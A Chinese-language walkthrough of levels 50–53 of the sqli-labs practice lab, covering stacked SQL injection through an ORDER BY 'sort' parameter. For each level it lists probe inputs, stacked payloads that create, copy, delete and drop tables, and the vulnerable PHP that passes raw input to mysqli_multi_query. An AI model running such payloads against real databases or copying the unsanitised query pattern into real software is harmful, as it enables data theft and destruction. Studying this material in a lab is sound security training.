sqli-labs 通关指南:Less 50 ~ 53
Less 50 ~ 53 和 Less 46 ~ 49 的注入方法完全一样,但是这 4 个 Less 可以进行堆叠注入。
目录
Less 50
判断注入类型
输入正常的参数,网页回显用户名列表。对 sort 参数使用单引号闭合,网页返回错误信息。
?sort=1'
将后面的内容注释掉,网页返回错误的信息。进行下面的所有测试,得出此处存在数值型注入。
?sort=1'--+
?sort=1')--+
?sort=1'))--+
?sort=1"--+
?sort=1")--+
?sort=1"))--+
堆叠注入
和 Less 46 一样使用报错注入或时间注入就可以完成,此处用于测试堆叠注入。使用堆叠查询完成 Less 38 的样例。
?sort=1;CREATE TABLE WhiteMoon LIKE users;--+
?sort=1;INSERT INTO WhiteMoon SELECT * FROM users;--+
?sort=1;DELETE FROM WhiteMoon;--+
?sort=1;DROP TABLE WhiteMoon;--+
SQL 查询语句
$sql = "SELECT * FROM users ORDER BY $id";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
{
?>
<center>
<font color= "#00FF00" size="4">
<table border=1'>
<tr>
<th> ID </th>
<th> USERNAME </th>
<th> PASSWORD </th>
</tr>
</font>
</font>
<?php
/* store first result set */
if ($result = mysqli_store_result($con1))
{
while($row = mysqli_fetch_row($result))
{
echo '<font color= "#00FF11" size="3">';
echo "<tr>";
echo "<td>";
printf("%s", $row[0]);
echo "</td>";
echo "<td>";
printf("%s", $row[1]);
echo "</td>";
echo "<td>";
printf("%s", $row[2]);
echo "</td>";
echo "</tr>";
echo "</font>";
}
}
echo "</table>";
}
Less 51
判断注入类型
输入正常参数,网页回显用户名列表。对 sort 参数使用单引号闭合,网页返回错误信息。
?sort=1'
将后面的内容注释掉,网页返回正常的信息,得出此处存在单引号闭合的字符型注入。
?sort=1'--+
堆叠注入
和 Less 47 一样使用报错注入或时间注入就可以完成,此处用于测试堆叠注入。使用堆叠查询完成 Less 38 的样例。
?sort=1';CREATE TABLE WhiteMoon LIKE users;--+
?sort=1';INSERT INTO WhiteMoon SELECT * FROM users;--+
?sort=1';DELETE FROM WhiteMoon;--+
?sort=1';DROP TABLE WhiteMoon;--+
SQL 查询语句
$sql="SELECT * FROM users ORDER BY '$id'";
Less 52
判断注入类型
输入正常参数,网页回显用户名列表。对 sort 参数使用单引号闭合,网页无回显。
?sort=1'
将后面的内容注释掉,网页无回显。进行下面的所有测试,得出此处存在数值型的盲注。
?sort=1'--+
?sort=1')--+
?sort=1'))--+
?sort=1"--+
?sort=1")--+
?sort=1"))--+
堆叠注入
和 Less 48 一样使用时间盲注就可以完成,此处用于测试堆叠注入。使用堆叠查询完成 Less 38 的样例。
?sort=1;CREATE TABLE WhiteMoon LIKE users;--+
?sort=1;INSERT INTO WhiteMoon SELECT * FROM users;--+
?sort=1;DELETE FROM WhiteMoon;--+
?sort=1;DROP TABLE WhiteMoon;--+
SQL 查询语句
$sql = "SELECT * FROM users ORDER BY $id";
Less 53
判断注入类型
输入正常参数,网页回显用户名列表。对 sort 参数使用单引号闭合,网页无回显。
?sort=1'
将后面的内容注释掉,网页用户名列表,得出此处存在单引号闭合的字符型的盲注。
?sort=1'--+
堆叠注入
和 Less 49 一样使用时间盲注就可以完成,此处用于测试堆叠注入。使用堆叠查询完成 Less 38 的样例。
?sort=1';CREATE TABLE WhiteMoon LIKE users;--+
?sort=1';INSERT INTO WhiteMoon SELECT * FROM users;--+
?sort=1';DELETE FROM WhiteMoon;--+
?sort=1';DROP TABLE WhiteMoon;--+
SQL 查询语句
$sql="SELECT * FROM users ORDER BY '$id'";